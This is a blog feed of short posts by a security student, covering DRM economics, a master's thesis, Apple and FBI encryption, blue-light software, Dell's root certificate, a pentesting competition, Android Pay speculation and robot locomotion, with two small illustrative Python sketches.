<p>DRM has become an active topic of debate in multiple communities due to recent changes in how technology allows us to access and experience digital content, such as movies, shows, games, and music. With the decline in users buying and storing their own digital content in favor of services (Netflix, Hulu, Steam, Spotify, etc.) that offer to stream it over the internet on-demand, DRM touches more lives now than ever before.</p>
<p>For users of these services, the benefits of not having to think about storage and having cheap and immediate access to the latest content are very appealing. Try to access content from even a year ago, however, and the trade-off becomes apparent. These services may be cheaper, but they also don't guarantee lifetime access as licenses change and budgets require <a href="https://news.slashdot.org/story/16/10/12/2011240/netflix-now-only-has-31-movies-from-imdbs-top-250-list">money-saving cuts</a>. As some users have been frustrated to realize, there's a difference between paying to access and paying to own. Adding to the frustration is the inability to access content on some services when an internet connection is slow or unavailable.</p>
<p>The idea of using computers to illegally share digital content is not new to digital content services, but these services do give the act new motivation. Where users might have considered illegal sharing to avoid the cost of buying the digital content, now users seek to avoid subscription fees, ensure lifetime availability, and counteract limited internet connectivity. This motivates license holders to require services to implement DRM; systems designed to make it difficult for a user to permanently store and illegally share on-demand digital content.</p>
<p>However, I fear that many license holders demand these systems without actually realizing their limitations and unintended consequences. That is why in this blog post I would like to take the time to formulate the problem of using DRM to protect against illegal storing and sharing from the perspective of an information security researcher. Frankly, I think DRM is a losing battle and I want to present the reader with a robust formulation to justify why I see it that way.</p>
<h2>Cat and Mouse</h2>
<p>The first thing we have to understand is that DRM in practice cannot completely prevent illegal storage and sharing. Simply put, you can't show someone something without showing it to them and once they've seen it, you can't prevent them from having some ability to reproduce it. Even if you had a magic wand that could somehow wipe their memory, who's going to want what you have to share if they won't remember it? DRM cannot be perfect.</p>
<p>However, this is not to claim that DRM cannot be effective. Specifically, we can think of using DRM as making a trade-off between multiple factors. Namely, the cost of implementing the DRM and the inconvenience the DRM presents the benign user versus the time and skill required for the adversarial user to bypass it. In other words, an effective DRM system is one that is cheap to implement, produces few enough side effects that the benign user is still willing to pay for the service, and requires the adversarial user to commit a lot of time and skill to bypass.</p>
<p>So keep the good, throw out the bad, and we're done, right? Not so fast. We could do just that if the factors had no relationship to each other, if they were independent, but they aren't. Anything you do to make the adversarial user's task harder is going to increase the cost of implementation and inconvenience the benign user. Don't believe me? Implementing software DRM restricts the benign user to only systems that can run that software and allows the adversarial user to bypass the DRM using her own software. Operating system DRM now requires the adversarial user to implement their own operating system software, but also now restricts which operating systems the benign user can use. Hardware DRM raises the bar further by requiring the adversarial user to devise a hardware level bypass, but now the benign user can only use certain hardware. Hopefully you can see how this is a game of cat and mouse. The harder you make it for an adversarial user to bypass the DRM, the more restrictive the benign user's experience becomes. Similarly, as you increase the skill the adversarial user needs to bypass the DRM, you also raise the skill the programmer implementing the DRM needs to design it, which raises the cost. Basically, as you make the DRM better at thwarting the adversarial user, you also make the service more expensive and less appealing to the benign user.</p>
<p>Hopefully you now see why balancing the factors I've pointed out is not trivial. The next question is how hard is it to find this optimal balance. If it's easy we can just find it and we're done. We'd then know what degree of DRM to implement.</p>
<p>Sadly, I'm going to argue that it's not easy to find. In fact, the reason finding it is difficult is that it's subjective and constantly changing! Notice that all the factors I defined are very soft. User experience is hard to measure. The user's tolerance for being inconvenienced is hard to measure. Even skill and cost are hard to measure in this context. Not only that, but these factors change over the course of public discussion. Opinions simply change. What all this means for us is that it's difficult to measure the factors we're interested in, it's difficult to determine when we've struck an optimal balance, and even if we strike a balance it might not stay balanced for very long. In other words, our best efforts will be no better than a random guess. Sure, we might get lucky, but why pay to play in the first place?</p>
<h2>Two Extra Cents</h2>
<p>In general I find it interesting to argue that people are blinded by an unjustified pressure to achieve progress. That's not to claim that we never take steps in the right direction, but rather that when the path becomes too foggy we tend to start taking random steps and then spend a lot of effort convincing ourselves that the steps somehow weren't random. It's worth pondering if a solution has fallen into this pattern because the result when it does is a lot of effort spent on something that doesn't actually solve the intended problem.</p>Demystifying the Master’s Thesis — Is it right for you?2016-04-21T22:30:00-04:002016-04-21T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-04-21:/demystifying-the-masters-thesis.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few weeks ago I successfully defended my master’s thesis. At 55 pages long, it summarizes my research findings from two years spent in Professor Kevin Du’s lab studying the security of the Android operating system. With its …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few weeks ago I successfully defended my master’s thesis. At 55 pages long, it summarizes my research findings from two years spent in Professor Kevin Du’s lab studying the security of the Android operating system. With its acceptance, I receive the last six credits needed to complete my degree. It was a long and intense process, and honestly, there are easier ways to earn credits.</p>
<p>Depending on your program, a thesis isn’t always a requirement. Many students opt for their program’s non-thesis track. So, how do you know if completing a thesis is right for you?</p>
<p>Let’s start by defining it. A master’s thesis is a cumulative work summarizing a student’s independent research on a specific topic related to their major. In my case, that topic was the security and privacy of Android intent inter-process communication. Translation—how do applications in an Android device share messages between one another and what features can we add to protect their “conversation?”</p>
<p>Thesis work is overseen by a research advisor, a professor who provides feedback and direction. Ultimately, it is the student’s responsibility to find a topic and perform the study on their own. Depending on the field of research, it will generally take a student one or two years to finish writing their master’s thesis. This makes prior planning essential to ensure that the thesis will be completed in time for graduation.</p>
<p>Once the thesis is complete and the advisor is satisfied with the work, the student has to defend it in front of a committee of four faculty members. The defense consists of a 20-minute presentation followed by questions. It takes about an hour. Once complete, the members convene privately to decide the outcome of the defense. A thesis can either be accepted, accepted with minor revision, accepted with major revision, or rejected. Thankfully, rejections are rare when the student follows their advisor’s guidance.</p>
<p>Once the thesis is accepted and any revisions are made, it’s sent off for publication and will usually be printed and placed in the university’s library. Most departments give their thesis students three to six elective credits depending on how much time went into creating the thesis.</p>
<p>So that’s all the gritty detail of how a master’s thesis works, but why do one in the first place? If your objective is to get your degree and go directly into industry as efficiently as possible, a thesis probably isn’t for you. It’s much safer to take classes to get those elective credits and most employers value time spent in internships more. The student who should consider a thesis is one who is interested in gaining exposure to research. I could write for great lengths about the difference between being an engineer and being a researcher, but suffice to say, the open-endedness makes researching a very different ballgame. A master’s thesis is a great opportunity to test the waters and see if that’s the kind of career you want to pursue. If you go for it, it opens the door to pursue a doctorate. If not, the door to industry will certainly be open to someone with your qualifications and research.</p>
<p>As with anything, it’s important to make the choice that is right for you. For me, the extra effort was well worth it. This fall I’ll be a doctorate student at Georgia Tech—a goal I am very proud to achieve. My experience completing my thesis at Syracuse University’s College of Engineering and Computer Science and in Professor Du’s lab has given me the confidence to take another leap into computer science research.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Apple’s Balancing Act—Yesterday, Today, and Tomorrow2016-04-01T22:30:00-04:002016-04-01T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-04-01:/apple-yesterday-today-tomorrow.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few months ago I read <a href="http://www.orbooks.com/catalog/splinternet-by-scott-malcomson/">Splinternet</a> by Scott Malcomson. It recounts the early days of the internet and personal computing. One section in particular caught my attention—a quote taken from an abandoned Apple ad campaign:</p>
<blockquote>
<p>"There are monster …</p></blockquote><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few months ago I read <a href="http://www.orbooks.com/catalog/splinternet-by-scott-malcomson/">Splinternet</a> by Scott Malcomson. It recounts the early days of the internet and personal computing. One section in particular caught my attention—a quote taken from an abandoned Apple ad campaign:</p>
<blockquote>
<p>"There are monster computers lurking in big business and big government that know everything from what motels you’ve stayed at to how much money you have in the bank. But at Apple we’re trying to balance the scales by giving individuals the kind of computer power once reserved for corporations."</p>
</blockquote>
<p>This quote is from 1984, and yet it could just as easily be mistaken for something said in 2016 given today’s controversies. I find it provocative for two reasons.</p>
<p>First, three decades later the issues raised in this marketing pitch are still relevant. Today, we struggle to decide how to handle technology that knows our very location, companies that track our browsing behavior via web cookies, and governments that make lethal decisions based on metadata. On one hand, it’s frustrating to see how little progress we’ve made in solving issues like these, but on the other it’s comforting to know that problems like these aren’t new and we’ve survived to this point in spite of them. I’m optimistic that as these issues grow to affect our lives in more significant ways, we’ll accelerate our efforts to resolve them.</p>
<p>Second, look at how much Apple has changed in three decades. Look at how they’ve gone from being the underdog, liberating the masses from the chains of the IBM mainframes only to become a massive conglomerate themselves. Modern Apple has appealing products for sure, but make no mistake that what they offer is a closed ecosystem where the customer is expected to run Apple software on top of Apple hardware. In the pursuit of perfecting the user experience, Apple has created a walled garden that takes control of their products away from the consumer. This is a stark contrast to the Apple that once made the analogy of the personal computer being a bicycle for the mind.</p>
<p>All that said, perhaps the Apple of tomorrow will strike a new balance between these two Apples I’ve mentioned. We’ve seen in recent months Apple’s commitment to resisting the FBI’s request for aid in unlocking encrypted iPhones. We might even see future iterations of the smartphone implement new security features that even Apple won’t be able to bypass. Only time will tell how the second act of this ongoing story will play out, but I’m excited to watch it develop.</p>
<h2>Apple vs. the FBI (2016-02-22)</h2>
<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>In the wake of the tragic shooting in San Bernardino, many questions remain and people want answers. It seemed like a breakthrough in the investigation was imminent when the FBI got their hands on one of the shooters’ iPhone, only to be thwarted by the discovery that the device was encrypted and password protected. Ten wrong guesses and the device will wipe itself clean including all the precious data within.</p>
<p>In light of the situation, a judge officially ordered Apple to aid the FBI in unlocking the iPhone. However, Apple has announced that they refuse to comply. Not only that, but Google has also announced that they support Apple’s decision to challenge the judge’s ruling. Why are two major tech companies reluctant to aid in an investigation? The problem has nothing to do with the technology, but rather the societal consequences such aid would bring.</p>
<p>In order for Apple to unlock the shooter’s device, they would have to circumvent the security mechanisms of their own device. This same technique could then be applied to any iPhone in the world. If Apple created such a capability and put it to use in this case, who’s to say they would never use it again? Allowing such a power to exist would create a precedent that would undermine their customers’ trust in all of Apple’s products. And this distrust could radiate outward to other tech companies like Google and Microsoft, which could likewise do the same.</p>
<p>But the consequences wouldn’t only be to Apple’s profit margin. Encryption levels the playing field between the mighty and the weak. The same encryption that is thwarting the FBI’s investigation is simultaneously allowing citizens who live under oppressive regimes to circumvent country-wide censorship while avoiding unjust prosecution. Betray these users’ trust with this new precedent, take away their means of broadcasting their voice, and the whole world becomes a darker place.</p>
<p>The root of this problem is not one we are unfamiliar with. Time and time again we are presented with the question of the benefits of taking something away from everyone in order to prevent a few from abusing it. The answer is dependent on the details, and in this case I side with Apple in saying that they should not comply with this order. Compliance would not only hurt American citizens and American companies, it would hurt every citizen of every country. We cannot allow tragedy to drive us towards oppression. We must maintain transparency for the strong and encryption for the weak.</p>
<h2>SU Senior Carter Yagemann’s Summer of Android (2016-02-22)</h2>
<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>This summer, Carter Yagemann, a rising senior in the Computer Science program from Jupiter, Florida, spent his summer crawling the Android operating system as part of the Department of Electrical Engineering and Computer Science’s Research Experience for Undergraduates (REU) program. Carter investigated Android security using “an intent firewall” to protect user’s information on smartphones and tablets. We caught up with him following his final presentation of his research to a room of faculty and students at Syracuse University.</p>
<p><strong>How did you learn about the REU program?</strong></p>
<p>I was actually a student in one of Professor Du’s classes and I had been doing internships in the private sector. I started as a web developer for Frontier Communications and then I worked for JPMorgan Chase in some of their security areas. I wanted to gain as much exposure as I could, so I was interested in getting into research. I approached Professor Du and he gave me an offer to do research under him.</p>
<p><strong>What has this experience been like?</strong></p>
<p>It’s been a lot of fun. It’s been nice to pursue what I’m interested in. There’s a lot less red tape and hurdles when you’re doing research versus in the private sector where there is a lot of regulation and accountability. It was really fun, really educational. I get to be with my peers, people more my age. I can mostly do what I want.</p>
<p>One of the things that is very different with research is that it’s very open ended. You don’t really know what’s going to get traction and what’s going to turn out to be impossible. It’s very free flowing and very flexible. The professors give you some ideas of where to start and you go from there to see if it works or not.</p>
<p>Professor Du was definitely interested in the intent firewall, but most of my research is my own work. I made all of the documentation and the website. I’m the one who crawled all the source code. He was the one who gave me the idea and I took off with it.</p>
<p><strong>Why did you choose to come to Syracuse University?</strong></p>
<p>I was choosing between here and Drexel University and I wasn’t sure that I wanted to be in a big city like Philadelphia. I picked Syracuse because there’s a nice atmosphere here. It’s a condensed campus, and there’s a lot going on. It’s a nice place to be.</p>
<p><strong>What else are you involved in at SU?</strong></p>
<p>I like everything about programming, so I do some hack-a-thons at the Student Sandbox at the Tech Garden in Downtown Syracuse. I have a few friends from the iSchool who often get together to do little things. Freshman year we created a platform called BeerText. The idea was you could text the name of a beer to a certain number and it would send you back a text with a description of the beer. It was really cool. It went viral on Twitter and Reddit. We got 35,000 users in 48 hours.</p>
<p><strong>What do you plan to do with your degree in Computer Science after you graduate?</strong></p>
<p>I definitely want to continue to pursue cybersecurity. Right now I am looking in multiple places. I’m looking at what’s going on out in Silicon Valley and what’s going on with the government.</p>
<p>I am also interested in being an entrepreneur. I have started writing some applications and I have pushed some out to the Google Play Store. I’m kind of a one-man app dev company. I’m definitely interested in getting out there on my own or with friends and talented people. On the other hand, large companies tend to have the resources to be able to do some pretty interesting things.</p>
<p>I just want to go where the interesting work is – something I haven’t seen before. I’m really open. Part of the point of this research was to try to find where I’m happiest.</p>
<h2>About the Electrical Engineering and Computer Science REU</h2>
<p>The Department of Electrical Engineering and Computer Science hosted its annual Research Experience for Undergraduates (REU) program this summer. It culminated with a half-day of presentations in July in which seven REU students from four different universities, including SU, Cornell, SUNY Fredonia, and the University of Illinois at Urbana-Champaign, completed research on a range of topics. The predominant theme was the development and security of the Android operating system.</p>
<p>Over the course of the summer, students worked with an advisor to select a topic that interested them and advanced the College’s research, then immersed themselves in their chosen subjects. The experience is educational for the students and the advisors alike.</p>
<p>“There are expectations that we are researching and getting something out of this experience. The first thing we are asked is what we want to work on, then our advisor helps us develop research questions from that,” describes Jonathan Secora, a computer science major at SU who focused on animations on the Android platform this summer.</p>
<p>Kevin Du, Professor of Computer Science, advised the students that focused on Android devices including:</p>
<ul>
<li><strong>Gabrielle George</strong>, “A Drinking From the Fire Hydrant Approach to Learning Computer Science”</li>
<li><strong>Jonathan Secora</strong>, “Animation and Application in Android”</li>
<li><strong>Curtis Robinson</strong>, “A Short Survey of Android”</li>
<li><strong>Jason Davison</strong>, “Communication Problems with the Android System”</li>
<li><strong>Carter Yagemann</strong>, “Intent Firewall – Android Security via Intent Filtering”</li>
</ul>
<p><strong>Fred Schlereth</strong>, Associate Research Professor of Electrical Engineering, advised Tom McLeod as he examined “Trapping of Molecules Inside Non-Ideal Nanoscale Channels.”</p>
<p>Current computer science Ph.D. student Paul Rattazi advised Wesley Brooks at AFRL on “Self-Protecting Apps: Helping Developers Protect Your Sensitive Data.”</p>
<h2>How Orange Helps You Sleep At Night (2016-02-04)</h2>
<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Everyone at Syracuse University knows that orange is the very best college color, but who knew it could also help you sleep? <a href="http://www.pnas.org/content/112/4/1232.full.pdf">Research conducted in recent years</a> has shown that sleep problems are on the rise and one theory gaining momentum points to our electronics as the cause.</p>
<p>Studies find that the abundance of blue light produced by our smartphones, tablets, and computer screens has a tangible impact on the chemistry in our bodies that regulates when to wake up and when to go to sleep. This isn’t a problem during the day when the sun naturally produces its own blue light, but staring at our own personal mini sun before bed can make falling asleep much more difficult.</p>
<p>So what can we do about it? We could restrict ourselves from staring at screens an hour before bedtime, but the world is a busy place and our nighttime reading isn't always ink on paper. Instead, programmers are experimenting with software that reduces the level of blue light our screens produce after sunset. As the sun goes down, the screen shifts from a bluish glow to an orange tint and then back to blue with the following sunrise—promising a better night’s sleep for those of us who are unable (or unwilling) to give up our screens at night.</p>
<p>This software is already publicly available for computers thanks to groups like <a href="https://justgetflux.com/">f.lux</a>, but availability on mobile devices is limited. Luckily, the big companies have taken notice and are taking action. <a href="http://www.apple.com/ios/preview/">In an upcoming version of iOS for iPhones and iPads</a>, Apple plans to introduce Night Shift. Flip it on and it'll automatically determine when the sun sets and rises in your area and adjust the screen's color accordingly. Just another reason to GO ORANGE.</p>
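<p>The sunset-to-sunrise tint shift these tools perform can be sketched with a simple interpolation. To be clear, this is a toy model, not the actual f.lux or Night Shift algorithm; the color temperatures, the one-hour fade, and the function name <code>screen_temperature</code> are all assumptions made for illustration.</p>

```python
from datetime import time

# Assumed white points -- real tools expose these as user settings.
DAY_KELVIN = 6500    # typical daytime screen color temperature
NIGHT_KELVIN = 3400  # warm, orange-tinted nighttime temperature

def screen_temperature(now: time, sunset: time, sunrise: time,
                       fade_minutes: int = 60) -> int:
    """Return a target color temperature in Kelvin for the current time.

    Daytime (sunrise to sunset) stays blue; after sunset the screen
    fades linearly to the orange tint, then shifts back at sunrise.
    """
    def minutes(t: time) -> int:
        return t.hour * 60 + t.minute

    n, down, up = minutes(now), minutes(sunset), minutes(sunrise)
    if up <= n < down:                       # between sunrise and sunset
        return DAY_KELVIN
    elapsed = (n - down) % (24 * 60)         # minutes since sunset
    if elapsed < fade_minutes:               # still fading toward orange
        frac = elapsed / fade_minutes
        return round(DAY_KELVIN + frac * (NIGHT_KELVIN - DAY_KELVIN))
    return NIGHT_KELVIN                      # deep night

# Halfway through a one-hour fade after a 5:30pm sunset:
print(screen_temperature(time(18, 0), time(17, 30), time(6, 30)))  # 4950
```

<p>A real implementation would also look up sunset and sunrise for the user's location, which is the part Night Shift is said to automate.</p>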
<h2>Understanding Dell’s Root Certificate Problem (2015-11-30)</h2>
<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p><a href="http://www.theregister.co.uk/2015/11/23/dude_youre_getting_pwned/">A recent discovery in the security community</a> has researchers concerned about Dell devices. Some of these devices have been found to contain something known as a self-signed root certificate. Installed by the manufacturer for advertising purposes, these certificates pose a risk to users. This is not the first time this has happened; there was <a href="http://www.cnet.com/news/superfish-torments-lenovo-owners-with-more-than-adware/">an earlier case involving Lenovo devices</a> known as Superfish. In this article I will try to explain the problem in an approachable manner as well as point readers toward actions they can take to protect themselves.</p>
<p>What are these self-signed root certificates the security experts talk about, and why are they dangerous? Understanding the problem requires understanding some characteristics of the public key infrastructure (PKI). PKI is complex in practice, but we can use a simplified model to understand the problem at hand. All we need to know is that there are keys and certificates. By using a key, one can create certificates. If we trust the party who holds a particular key, then we can trust the certificates made from that key.</p>
<p>Trust, in this case, implies two fundamental trusts: first, that the party holding the key will keep that key secret; second, that the party will only make certificates for other trustworthy parties. This is the network of trust upon which we perform our sensitive internet tasks such as banking, shopping, and communicating.</p>
<p>The problem with the Dell root certificate and Superfish is that the manufacturer has created a "trusted" key which sits on every user's device. The same key. Steal this key from any one device and the thief can create certificates that will be trusted by all devices. Google, Facebook, Bank of America, Amazon: all of these parties can be impersonated by creating new certificates.</p>
<p>Exposing users to such a risk is a severe oversight. Thankfully, the concerns of the security community have been heard and users can now take action to remove these self-signed root certificates. If you use a Dell or Lenovo device, I encourage you to consult your manufacturer's website for more details:</p>
<ul>
<li><a href="http://www.dell.com/support/article/us/en/04/SLN300321?c=us&amp;l=en&amp;s=bsd&amp;cs=04">Dell Support</a></li>
<li><a href="https://support.lenovo.com/us/en/product_security/superfish_uninstall">Lenovo Support</a></li>
</ul>
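<p>The trust failure behind Superfish and the Dell certificate can be made concrete with a toy model. This sketch uses no real cryptography; the <code>Key</code> class and the <code>is_trusted</code> check are invented stand-ins meant only to show why one shared, extractable root key breaks trust for every device that ships it.</p>

```python
class Key:
    """Stand-in for a CA signing key (no real cryptography here)."""
    def __init__(self, owner: str):
        self.owner = owner

    def issue_certificate(self, subject: str) -> dict:
        # A certificate is just "this key vouches for this subject".
        return {"subject": subject, "issuer_key": self}

def is_trusted(cert: dict, trust_store: list) -> bool:
    # A device trusts any certificate issued with a key in its root store.
    return cert["issuer_key"] in trust_store

# The Dell/Superfish mistake: the SAME root key preinstalled everywhere.
shared_root = Key("vendor-preinstalled root")
every_device_trust_store = [shared_root]

# An attacker extracts the key from any single machine...
stolen = shared_root
forged = stolen.issue_certificate("www.bankofamerica.com")

# ...and every other machine shipping that root trusts the forgery,
# while a certificate from an unknown key is still rejected.
print(is_trusted(forged, every_device_trust_store))   # True
print(is_trusted(Key("attacker").issue_certificate("x"),
                 every_device_trust_store))           # False
```

<p>A legitimate CA avoids this by keeping a single, well-guarded copy of its root key, which is exactly the first of the two fundamental trusts described above.</p>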
<h2>Students Compete in RIT Cybersecurity Competition (2015-11-11)</h2>
<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Last weekend, I had the opportunity to compete in the first-ever Collegiate Pentesting Competition along with five other members from the iSchool's Information Security Club. Hosted by RIT, this competition places competing university teams in the role of security consulting companies contracted to assess the strength of a corporate network. This competition stresses technical and soft skills. Competitors must leverage their technical abilities to find vulnerabilities, as well as document and present their findings to the nontechnical executive board of the corporation.</p>
<p>I am excited to announce that out of the nine university teams that competed from across the northeast, Syracuse University took third place!</p>
<p>The Collegiate Pentesting Competition distinguishes itself from other cybersecurity competitions by placing a heavy emphasis on the business side of running a security company. Traditionally, security competitions fall into two categories: purely defensive or purely offensive. Purely defensive competitions, such as the Collegiate Cyber Defense Competition, restrict competitors to solely defending a network while a professional team of hackers tries to exploit vulnerabilities to gain access. This type of competition forbids any offensive actions on the part of the competing students. Conversely, purely offensive competitions, such as Capture The Flag events, present competitors with tasks that must be completed by breaking into vulnerable computer systems. Since the sole objective of these competitions is to recover the “flags,” competitors are encouraged to use any offensive tactics possible with complete disregard for collateral damage. In these competitions, the systems and networks often get destroyed as teams race to complete the given tasks.</p>
<p>The Collegiate Pentesting Competition is a hybrid between offense and defense. Teams still use offensive techniques to detect and exploit vulnerable systems, but they must do so in a way which does not damage the systems or hinder the company's ability to do business. This requires the teams to be surgical in their methodology rather than simply “smashing and grabbing.”</p>
<p>Overall, I highly enjoyed this competition. The level of realism and professionalism it entailed made competing a very educational experience. I look forward to seeing the Information Security Club compete next year.</p>
<h2>Android for Your Laptop (2015-11-03)</h2>
<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Google recently announced plans to merge features from Chrome OS into Android to make the operating system suitable for use with laptops. This means that in the future, we can anticipate Android working across phones, tablets, and laptops. This is a very bold vision, but it's one that was bound to happen and one that all Android users should be excited for.</p>
<p>Up to this point, Chrome OS has been Google's dedicated operating system for their lineup of Chromebook computers. While Chrome OS offers unique features in terms of user experience and security at a price point that beats most other laptops on the market, Google's substantially different approach to designing laptops has made the Chromebook a relatively niche device. In the years it has existed, it has never reached the point of being a real competitor in the Windows-dominated laptop market.</p>
<p>Contrast this with Android, which dominates the smartphone market at over 80 percent market share, and the reasoning behind this merging of the two operating systems becomes clear. If Google can successfully take their winning mobile user experience and port it to laptops, they'll have a formula for a laptop that stands toe-to-toe with Windows and OS X. I think that this is going to be the Google operating system to give Microsoft and Apple a run for their money.</p>
<p>Users should be excited for this move as well. The average user now owns more devices than ever before and they want a consistent experience regardless of whether they're using a phone, tablet, laptop, or desktop. Google does an excellent job of making the interaction between the user and the device clean, efficient, and friendly, and soon we'll get these same benefits for the laptop. However, there are a handful of design challenges that Google will have to overcome if they want Android for the laptop to be a success and not just another niche product like Chrome OS.</p>
<p>For starters, laptops are dominantly used for content creation where mobile devices are mostly for consuming. Laptops are like the working man's pickup truck. Users have different demands for laptops than mobile devices. If Android is to succeed in the laptop environment, a greater emphasis will have to be placed on productivity. This means efficient switching between applications, strong support for keyboards, and plug-and-play functionality for external storage and additional peripherals. These are things only supported to a limited degree in current Android.</p>
<p>Screen size also becomes an issue for Android on laptops. Android's current interfaces are designed for relatively small screens—under 10 inches in size. Now that Google wants Android to run on laptops and desktops, they'll have to redesign the look and feel for screen sizes in excess of 16 inches. It may only be a few extra inches, but this makes a huge difference if you don't want the screen to appear barren.</p>
<p>For the average user who already uses Android on their mobile devices, I think the transition to Android for laptops will be pretty smooth. Android already has the email clients, web browsers, and office applications these users need for their everyday work. For the "power user," however, I think the new operating system will be a harder sell. These users manage corporate infrastructures, develop software, automate systems, deploy virtual machines, and regularly perform computing-intensive tasks. For them, unfortunately, the tools they need simply don't exist on Android yet.</p>
<p>I've anticipated Android moving to laptops and desktops for some time now and I hope others share my excitement over this recent announcement. There's a lot of work to be done, but I think that if Google can pull this off, we'll end up with something very special and unique.</p>
<h2>Initial Observations Regarding Android Pay (2015-10-30)</h2>
<p>Android Pay has just come out on the Google Play Store and it's an interesting concept in many ways. I can't help but be curious about its internal workings and after some discussion with a co-worker, I've decided to quickly write up our initial thoughts on the application.</p>
<h2>Scope</h2>
<p>These are some initial thoughts I had from a security perspective after using Android Pay for the first time. These observations are purely speculative and black box, so they should not be mistaken for fact. These speculations are being made before having done any decompilation or reverse engineering. I will try my best throughout this document to clearly state the observations driving each speculation I make.</p>
<h2>Transparency</h2>
<p>The first thing that stuck out to me is that Android Pay does not appear to be transparent to the banks. When I added my debit card to the application, for example, I was presented with an EULA from my particular bank. After that, I had to verify my card by signing into my bank's application. In the case of my co-worker, he didn't have to verify his card, but he did receive an email from his bank within minutes containing information regarding Android Pay. In other words, while I may not know exactly how the Android Pay system works, I speculate that it does necessitate the banks being aware of Android Pay. You'll see why this is important in the next speculation.</p>
<h2>Virtual Account Number</h2>
<p>The other thing that immediately stuck out to me is that upon adding a card to Android Pay, that card is given a "virtual account number." The in-app description of this number reads, "This number is used instead of your actual card number so that your info isn't shared with stores."</p>
<p>Interesting.</p>
<p>While privacy may indeed be part of the motivation behind using a virtual number instead of the real card number, I don't believe this to be the full story. Having worked in a bank for a short while, I know that one of the biggest concerns a bank has is liability and therefore risk management. As we speculated earlier, Android Pay isn't transparent to the banks. This means that the banks have a choice in participating which, in turn, means that they aren't going to participate unless the risks associated with Android Pay are minimal. I speculate this to be the <strong>true</strong> reason for the virtual number. By using this number in place of the real card's number, should a vulnerability in Android Pay be exploited, damage is limited to exposure of the virtual number and not the real number. Google can reissue this virtual number while the banks are protected from having to reissue a new card. Granted, a fraudulent transaction or two may occur in the time it takes for the virtual number to be deactivated and reissued, but the majority of the burden falls on Google and not the bank. It's even possible that the banks might have an agreement with Google where Google is responsible for repaying the banks for fraudulent charges occurring due to Android Pay.</p>
<p>This idea of risk mitigation will come up again in a later speculation I make.</p>
<h2>Transaction Processing</h2>
<p>The ultimate question my speculations aim to shed light on is: how does Android Pay work? What happens when a user makes a purchase using Android Pay? Given the previous two speculations, we can make some educated guesses. I must stress again that this is still speculation, but it is food for thought nonetheless.</p>
<p>Before I reveal my next speculation, a bit of background is necessary. Something which you must understand is that in card processing, time is very much of the essence. A transaction must be processed in a matter of seconds in order for the customer to be satisfied. In these few seconds, the transaction has to pass through multiple parties. In the case of the traditional card, there's the point-of-sale terminal which swipes the card, some back-end system for managing these terminals, the credit card processor (such as Visa), and the bank (such as JPMorgan Chase). The transaction has to pass through all these parties in order to be allowed.</p>
<p>With that understood, I tease my next speculation with a question: Who translates the virtual number into the real number? Surely this translation must happen somewhere, otherwise why would the Android Pay user provide a credit or debit card number in the first place? I speculate that it isn't Google.</p>
<p>Think about it. If Google was translating the virtual number into the real number at the time of use, the process would become transparent to the banks. There would be no reason for Google to solicit partnership with them. But we know Android Pay isn't transparent to the banks, which is strong reason to speculate that this is not the case. Google likely shares the virtual number with the bank at some point during the process of adding or verifying the card.</p>
<p>Handling the virtual number in this manner benefits both parties. First, this decreases the bank's risk because if the translation isn't handled by Google, then Google won't have to send the real number over the wire to the next party in the processing chain. This benefits Google as well because no translating on their end means no need to build out any infrastructure. They can piggyback off the existing card processing infrastructure.</p>
<h2>Unanswered Questions</h2>
<p>So who does the translation? If it isn't the retailer and it isn't Google, that leaves the bank and the card processor. Sadly, I don't have an answer to this question.</p>
<p>The other question I don't have an answer for is what is actually given to the retailer via NFC at the time of use. Is it simply the virtual number or is it something else?</p>
<p>These questions I leave to the reverse-engineers.</p>How Number of Limbs Relates to Robots and Organisms2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/locomotion.html<p>This weekend was the weekend over which DARPA hosted its large robotics challenge where semi-autonomous robots had to perform a series of tasks simulating a disaster relief scenario. Specifically, robots had to be able to open doors, shut off water valves, drill holes in walls, climb stairs and more. It …</p><p>This weekend was the weekend over which DARPA hosted its large robotics challenge where semi-autonomous robots had to perform a series of tasks simulating a disaster relief scenario. Specifically, robots had to be able to open doors, shut off water valves, drill holes in walls, climb stairs and more. It was quite the spectacle to watch and while it was impressive to see how far robotics has come, it also served as a reminder of how far robotics has yet to go. The robots were very slow at performing their tasks and there was plenty of falling over and unintended failures. Half the robots I observed couldn't even complete the first task of opening a normal door. In short, we can all rest easy knowing that these robots aren't going to be stealing our jobs or planning a violent uprising any time soon.</p>
<p>One other thing which the average observer may have noticed is that the four legged robots performed significantly better than the two legged humanoid robots. To many, the reasons may seem obvious; to others, less so. Yet even those who easily made sense of this outcome probably have not realized how consistent these results are with the biological organisms which inhabit our planet. With that in mind, I'd like to take a moment to write about locomotion and how it relates to robots and biological organisms alike.</p>
<h2>Locomotion in Biology</h2>
<p>Take a moment to recall every organism you can which moves over land using limbs. Now think about how many limbs each of these organisms has which are primarily used for moving. Now think about the number of limbs again, but this time pay special attention to the size of the organism relative to its number of limbs. Do this long enough, and a pattern should start to emerge. Specifically, smaller organisms like bugs tend to have six or more limbs while larger organisms like mammals have four and humans have only two. Once again, we're only considering the limbs used primarily for moving.</p>
<p>Is there something special about two limbs versus four limbs versus six limbs with regards to locomotion? As it turns out, there is. Specifically, the ability of the organism to remain stable while moving or while stationary changes with its number of limbs.</p>
<h2>Physics of Stability</h2>
